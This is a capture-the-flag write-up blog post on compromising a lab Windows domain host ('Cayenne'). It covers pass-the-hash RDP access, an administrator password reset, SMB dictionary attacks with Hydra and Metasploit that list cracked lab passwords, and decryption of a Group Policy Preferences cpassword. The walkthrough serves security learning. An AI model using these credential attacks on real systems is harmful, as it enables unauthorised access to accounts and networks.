[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	largePointerSupportFlags: 0x0001
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - MultifragmentUpdateCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	maxRequestSize: 0x0000FFFF
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - SurfaceCommandsCapabilitySet (length 8):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	cmdFlags: 0x00000052
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	reserved: 0x00000000
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - BitmapCodecsCapabilitySet (length 1):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	bitmapCodecCount: 0
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - Sending 
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - FrameAcknowledgeCapabilitySet (length 4):
[19:05:54:974] [820544:820545] [INFO][com.freerdp.core.capabilities] - 	frameAcknowledge: 0x00000002
[19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[19:05:54:075] [820544:820545] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[19:05:54:108] [820544:820545] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem
[19:05:54:109] [820544:820545] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[19:05:55:686] [820544:820545] [INFO][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex resetting error state
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - generalFlags (0x0000001E) {
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - 	CB_USE_LONG_FORMAT_NAMES
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - 	CB_STREAM_FILECLIP_ENABLED
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - 	CB_FILECLIP_NO_FILE_PATHS
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - 	CB_CAN_LOCK_CLIPDATA
[19:05:57:420] [820544:820556] [INFO][com.freerdp.channels.cliprdr.client] - }

If everything is correct and the pass-the-hash attack works on the host, we should see a FreeRDP window pop up, like the one below.

Kaos Corp Cayenne FreeRDP
Do you find this content useful? If so, consider buying me a coffee! ☕


Changing password

Since we have access to the command shell and with correct privileges to change the administrator's password, we only need a one-liner command to change the password. To change the administrator's password, issue the net user Administrator enter-your-password-here command, as shown below.

C:\Windows\system32>net user Administrator password1
C:\Windows\system32>net user Administrator password1
net user Administrator password1
The command completed successfully.

RDP access via password change

We should have access to the desktop environment with this password change. To access the desktop environment, we can use RDP since we see port 3389 (ms-wbt-server) is open.

andrew@kali:~$ rdesktop 172.20.20.37
andrew@kali:~$ rdesktop 172.20.20.37
Autoselecting keyboard map 'en-us' from locale
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.

Upon connecting, we see a familiar Windows login screen. In this case, we have to select the other user option and enter SCOVILLE\Administrator as the username and password1 for the password field. You may ask why I did not pick the first button since it would have done the same thing. Unfortunately, in this case, it was asking for a smart card.

Kaos Corp Cayenne Remote Desktop

As you can see, the password change worked, and we have access to the desktop environment now.

Kaos Corp Cayenne Desktop

VeraCrypt

Since we can see the VeraCrypt shortcut on the desktop, we can launch it to get the flag for our CTF event.

Kaos Corp Cayenne VeraCrypt

It is empty, so we need to figure out where the encrypted data is. Since there is only one hard disk on this host, I decided to look at the root directory. I noticed there is a DATA folder and some files in it.

Kaos Corp Cayenne Vault

Upon reading the README.txt file, it confirmed that the VAULT file is the encrypted research data.

Kaos Corp Cayenne Readme

Upon reading the README.txt file, it confirmed that the VAULT file is the encrypted research data. We will use this as our input file and the flag from the previous host as the decryption key.

Kaos Corp Cayenne VeraCrypt Vault

When I used the flag from the previous question, I received an error message. I then decided to input the other key, which is as32.cowboy-quad-powder-solidify. That password worked, as you can see from the screenshot below.

Kaos Corp Cayenne VeraCrypt Successful Decryption

Now that we have successfully decrypted the data, we can finally get the flag. It looks like all we need to do is open the FLAG.txt file, and we will get the flag.

Kaos Corp Cayenne Decrypted Data

As suspected, the flag is in the text file.

Kaos Corp Cayenne Flag

Flag

#8c1515

From the CTF perspective, we have completed the mission. But, from a penetration testing perspective, we are far from being done.

Other attacks

If this host was not vulnerable to EternalBlue, what else can we find to attack this host? Going back to the Nmap results, we can see that HTTP is running on this host.

Let's inspect the site to see if there is something useful there. Since we like command-line utilities, we will use the curl command to view the site's content.

andrew@kali:~$ curl http://172.20.20.37
andrew@kali:~$ curl http://172.20.20.37
<head>
</head>
<body>
<h2>
Scoville Lab Informatics Platform -- Under Construction!<br><br>
Please contact our administrators if you have any questions:<br><br>
jace.le<br><br>
fern.scott<br><br>
</H2>
<img src="Capsaicin_3D.png"><br><br>
Photo courtesy: https://dataverse.harvard.edu/dataset.xhtml?persistentId=doi:10.7910/DVN/F34GVS
</body>
</html>

From a CTF perspective, we should inspect the image file to see if something we can use. That said, we will download the image file and look at the strings command's output.

andrew@kali:~$ wget -q http://172.20.20.37/Capsaicin_3D.png ; strings Capsaicin_3D.png -n 10
andrew@kali:~$ wget -q http://172.20.20.37/Capsaicin_3D.png ; strings Capsaicin_3D.png -n 10
3:aahqHa Y
rq/i@mahq8
v'.ahqHa$u'
aC#+0lhh`04<
($$lPhH8A!!
$BPHHhP8!A
r:	'($$lPHH
6($$,PD !@
/8'sD&6z9l
	J/$lPhH0($$(;
		J/$lPhH8AQ
1H ECEP0H 
P0H ECEP0H ECQL4
	ECEP0H EC
R8PP0H ECEP0H ECEP0H 
R8PP0H ECEP0H ECQLd@
P0H ECEP0H 
P0H ECEP0H 
SVVVVVVVVM
Ar9me= S@ 
+pHs0HH(5{
-i(JD
Iuy,5S"FI*T:0
Pm:c5D+U5T
:gT<4wT

While there are other ways to inspect image files for steganography, we will ignore that at this time. We should, however, scan for hidden directories. I covered this technique in the first article of the series. I like gobuster than any other software out there, so we will use that again.

andrew@kali:~$ gobuster dir -u http://172.20.20.37 -w /usr/share/wordlists/dirb/common.txt
andrew@kali:~$ gobuster dir -u http://172.20.20.37 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://172.20.20.37
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/16 16:56:37 Starting gobuster in directory enumeration mode
===============================================================
/users                (Status: 301) [Size: 149] [--> http://172.20.20.37/users/]
                                                                                
===============================================================
2021/12/16 16:56:51 Finished
===============================================================

Our gobuster's output reveals that there is a directory called users. Let's view the page and see what is in there.

andrew@kali:~$ curl http://172.20.20.37/users
andrew@kali:~$ curl http://172.20.20.37/users/
<html><head><title>172.20.20.37 - /users/</title></head><body><H1>172.20.20.37 - /users/</H1><hr>
<pre><A HREF="/">[To Parent Directory]</A><br><br> 10/7/2020  1:44 PM          151 <A HREF="/users/users.txt">users.txt</A><br></pre><hr></body></html>

It looks like a list of users we can use on our Windows AD attack. We will save it on a text file and use it as our user wordlist.

andrew@kali:~$ curl http://172.20.20.37/users/users.txt
andrew@kali:~$ curl http://172.20.20.37/users/users.txt
# list of current lab members	
jace.le
fern.scott
summer.sloan
darcy.roman
troy.yates
eve.barr
max.clark
sally.bird
max.clark
yoder.mullins

The command below is how to save the output to a file. Additionally, I added the cat command to verify that we have what we need.

andrew@kali:~$ curl http://172.20.20.37/users/users.txt -s | grep -v "#" > users.txt ; cat users.txt
andrew@kali:~$ curl http://172.20.20.37/users/users.txt -s | grep -v "#" > users.txt ; cat users.txt
jace.le
fern.scott
summer.sloan
darcy.roman
troy.yates
eve.barr
max.clark
sally.bird
max.clark
yoder.mullins

SMB dictionary attack

We are now ready to perform an SMB dictionary attack on the Windows domain controller. Unfortunately, Hydra reduces the task to one on SMB connections. That said, it will take a long time for it to finish.

From a CTF perspective, it may not be ideal to wait for Hydra to complete. From a penetration testing perspective, it is no longer a viable method in gaining access. It is because many system administrators set account lockout settings. That said, performing a dictionary attack will result in many user calls.

Luckily, from an attacker's perspective, we found jace.le's password within a minute of running Hydra. Since we only need one account to access the desktop via RDP, we can cancel the dictionary attack process.

andrew@kali:~$ hydra -L users.txt -P /usr/share/wordlist/rockyou.txt smb://172.20.20.37
andrew@kali:~$ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt smb://172.20.20.37
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 19:33:04
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 143443990 login tries (l:/p:14344399), ~143443990 tries per task
[DATA] attacking smb://172.20.20.37:445/
[445][smb] host: 172.20.20.37   login: jace.le   password: nikita
[STATUS] 14347417.00 tries/min, 14347417 tries in 00:01h, 129096573 to do in 00:09h, 1 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

Alternatively, we can use a smaller wordlist when attempting a dictionary attack. In this case, we will use JtR's default wordlist. With this wordlist, we were able to get eight of nine accounts' passwords in less than five minutes.

andrew@kali:~$ hydra -L users.txt -P /usr/share/john/password.lst smb://172.20.20.37
andrew@kali:~$ hydra -L users.txt -P /usr/share/john/password.lst smb://172.20.20.37
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-16 23:16:59
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 35590 login tries (l:10/p:3559), ~35590 tries per task
[DATA] attacking smb://172.20.20.37:445/
[445][smb] host: 172.20.20.37   login: jace.le   password: nikita
[STATUS] 6291.00 tries/min, 6291 tries in 00:01h, 29299 to do in 00:05h, 1 active
[445][smb] host: 172.20.20.37   login: summer.sloan   password: butterfly
[445][smb] host: 172.20.20.37   login: darcy.roman   password: spongebob
[445][smb] host: 172.20.20.37   login: troy.yates   password: tinkerbell
[445][smb] host: 172.20.20.37   login: eve.barr   password: dolphins
[STATUS] 7415.00 tries/min, 22245 tries in 00:03h, 13345 to do in 00:02h, 1 active
[445][smb] host: 172.20.20.37   login: max.clark   password: asdfghjkl
[445][smb] host: 172.20.20.37   login: sally.bird   password: popcorn
[445][smb] host: 172.20.20.37   login: yoder.mullins   password: margarita
1 of 1 target successfully completed, 8 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-16 23:20:54

Metasploit SMB login scanner

Alternatively, we can use the SMB login scanner module in Metasploit. This auxiliary module seems to be slower than Hydra. There are advantages to using this, but if speed is what you want, then use Hydra.

Since there is a duplicate in our original user file, we can massage that a little bit to get rid of it.

andrew@kali:~$ curl -s http://172.20.20.37/users/users.txt | grep -v "#" | sort | uniq > users.txt ; cat users.txt
andrew@kali:~$ curl -s http://172.20.20.37/users/users.txt | grep -v "#" | sort | uniq > users.txt ; cat users.txt
darcy.roman
eve.barr
fern.scott
jace.le
max.clark
sally.bird
summer.sloan
troy.yates
yoder.mullins

We are ready to run Metasploit and use the SMB login scanner module. As usual, we need to set the options before we run any Metasploit module.

andrew@kali:~$ msfconsole -q
andrew@kali:~$ msfconsole -q
msf6 > search auxiliary smb login
Matching Modules
================
   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                                 normal  No     SMB Login Check Scanner
   1  auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt                   normal  No     SMB NTLMv1 Login Request Corruption

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
msf6 > use 0
msf6 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, use
                                                 r, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                                 sing-Metasploit
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts
msf6 auxiliary(scanner/smb/smb_login) > set abort_on_lockout true
abort_on_lockout => true
msf6 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/john/password.lst
pass_file => /usr/share/john/password.lst
msf6 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf6 auxiliary(scanner/smb/smb_login) > set verbose false
verbose => false
msf6 auxiliary(scanner/smb/smb_login) > set rhost 172.20.20.37
rhost => 172.20.20.37
msf6 auxiliary(scanner/smb/smb_login) > run
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\darcy.roman:spongebob'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\eve.barr:dolphins'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\jace.le:nikita' Administrator
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\max.clark:asdfghjkl'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\sally.bird:popcorn'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\summer.sloan:butterfly'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\troy.yates:tinkerbell'
[+] 172.20.20.37:445      - 172.20.20.37:445 - Success: 'scoville\yoder.mullins:margarita'
[*] 172.20.20.37:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

One of the good things about this module is that it can tell if the user is part of the administrator group. It makes it easier for us to identify which account to use.

Anonymous FTP

Based on our Nmap scan results, the FTP service allows anonymous login. That said, let's explore and see if we can find something there.

andrew@kali:~$ ftp 172.20.20.37 6000
andrew@kali:~$ ftp 172.20.20.37 6000
Connected to 172.20.20.37.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (172.20.20.37:andrew): anonymous
331 Password required for anonymous
Password:
230 Logged on
Remote system type is UNIX.
ftp> dir
200 Port command successful
150 Opening data channel for directory listing of "/"
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 domain
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 staging areas
drwxr-xr-x 1 ftp ftp              0 Sep 24  2020 sysvol
226 Successfully transferred "/"

After perusing the directories, I found an XML file worth looking at closely. I downloaded the file and viewed its contents.

ftp > dir
ftp> dir
200 Port command successful
150 Opening data channel for directory listing of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups"
-r--r--r-- 1 ftp ftp            476 Oct 06  2020 Groups.xml
226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups"
ftp> get Groups.xml
local: Groups.xml remote: Groups.xml
200 Port command successful
150 Opening data channel for file download from server of "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml"
226 Successfully transferred "/sysvol/scoville.local/Policies/{0B1DD8A3-C022-4ED3-A506-780B7B91C56B}/Machine/Preferences/Groups/Groups.xml"
476 bytes received in 0.00 secs (9.8685 MB/s)
ftp> !cat Groups.xml
<!--?xml version="1.0" encoding="utf-8"?-->
<groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><user clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="admin.local" image="2" changed="2020-10-07 05:33:08" uid="{C0D33E59-13B3-4C4E-8E5D-F45AC3D762E9}"><properties action="U" newname="" fullname="" description="" cpassword="E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc" changelogon="0" nochange="1" neverexpires="1" acctdisabled="0" username="admin.local"></properties></user>
</groups>

After viewing the contents, the cpassword section caught my eye. I used this as my keyword search and found this page. It talks about the vulnerability of Windows' Group Policy Preferences.

Since I am using Kali Linux, I did not want to try and run PowerShell on Linux as the versions are not one-for-one equivalent. That said, I started looking at Python scripts that can decrypt it. Unfortunately, the first one I saw was not the right tool for the job. Eventually, I found out that Kali has one called gpp-decrypt.

andrew@kali:~$ gpp-decrypt E4DZ2eckuB8+4bHLageZCIe287lrIVgJk8kLPk9QdKc
2019*letmein

With the username and password at hand, we can access the desktop environment using RDP.

Final thoughts

There are many Windows vulnerabilities discovered in the past. In this article, we covered a few of them and exploited them. As I previously mentioned, CTFs and real-world engagements vary. Some CTFs are unrealistic in this day and age, but some are still valid. That is because businesses do not have the budget or care about security.

Some of the tactics, techniques, and procedures covered here are only applicable to CTFs. But, CTF write-ups, such as this, have some value as they serve as learning opportunities.

While the Kaos Corp environment has one or two more hosts left to explore, I may end the series here. The first article of the series was not as popular as I had hoped.

BUY ME COFFEE ☕

Did you find this content useful? If so, show your appreciation by buying me a coffee!


You might like to read

Kaos Corp: Habanero
Passed eJPT
Passed GCIH

BUY ME COFFEE ☕

Did you find this content useful? If so, show your appreciation by buying me a coffee!


About Andrew Roderos

I am a network security engineer with a passion for networking and security. Follow me on Twitter, LinkedIn, and Instagram.